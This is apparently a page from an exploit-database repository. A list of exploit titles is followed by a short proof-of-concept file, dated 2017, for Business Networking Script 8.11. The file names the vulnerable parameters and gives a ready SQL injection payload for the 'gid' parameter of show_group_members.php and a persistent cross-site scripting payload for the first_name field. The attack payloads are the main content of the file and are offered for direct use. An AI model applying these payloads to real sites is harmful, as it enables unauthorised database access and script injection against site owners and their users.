7c1c496c25
11 new exploits Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption Mozilla Firefox < 50.1.0 - Use After Free Mozilla Firefox < 50.1.0 - Use-After-Free HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1) HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3) HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2) HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4) iSelect v1.4 - Local Buffer Overflow Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite WinaXe Plus 8.7 - Buffer Overflow DiskBoss Enterprise - GET Buffer Overflow (Metasploit) Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) Photobase 1.2 - 'Language' Local File Inclusion Joomla! Component Portfol - (vcatid) SQL Injection Photobase 1.2 - 'Language' Parameter Local File Inclusion Joomla! Component Portfol 1.2 - 'vcatid' Parameter SQL Injection dMx READY (25 - Products) Remote Database Disclosure dMx READY (25 - Products) - Remote Database Disclosure Joomla! Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection Joomla! Component GigCalendar 1.0 - SQL Injection HSPell 1.1 - (cilla.cgi) Remote Command Execution HSPell 1.1 - 'cilla.cgi' Remote Command Execution PHP Photo Album 0.8b - (index.php preview) Local File Inclusion PHP Photo Album 0.8b - 'preview' Parameter Local File Inclusion Huawei Flybox B660 - Cross-Site Request Forgery Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change Image Sharing Script 4.13 - Multiple Vulnerabilities Million Pixels 3 - Authentication Bypass ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities
26 lines
913 B
Text
Executable file
26 lines
913 B
Text
Executable file
# Exploit Title : ----------- : Business Networking Script v8.11- SQLi &
|
|
Persistent Cross Site Scripting
|
|
# Author : ----------------- : Ahmet Gurel
|
|
# Google Dork : --------- : -
|
|
# Date : -------------------- : 16/01/2017
|
|
# Type : -------------------- : webapps
|
|
# Platform : --------------- : PHP
|
|
# Vendor Homepage : http://itechscripts.com/business-networking-script/
|
|
# Sofware Price and Demo : $299.00
|
|
http://professional-network.itechscripts.com
|
|
|
|
########## 1-SQL Injection ##########
|
|
|
|
##### Vulnerable Parameter Type : GET
|
|
##### Vulnerable Parameter : gid
|
|
##### Vulnerable URL :
|
|
http://localhost/[PATH]/show_group_members.php?gid=[SQLi]
|
|
##### SQLi Parameter : ' OR '1'='1
|
|
|
|
|
|
|
|
########## 2-Persistent XSS Payload ##########
|
|
|
|
##### Vulnerable URL : http://localhost/[PATH]/home.php
|
|
##### Vuln. Parameter: first_name=
|
|
##### PAYLOAD : '"--></style></Script><Script>alert(1)</Script>
|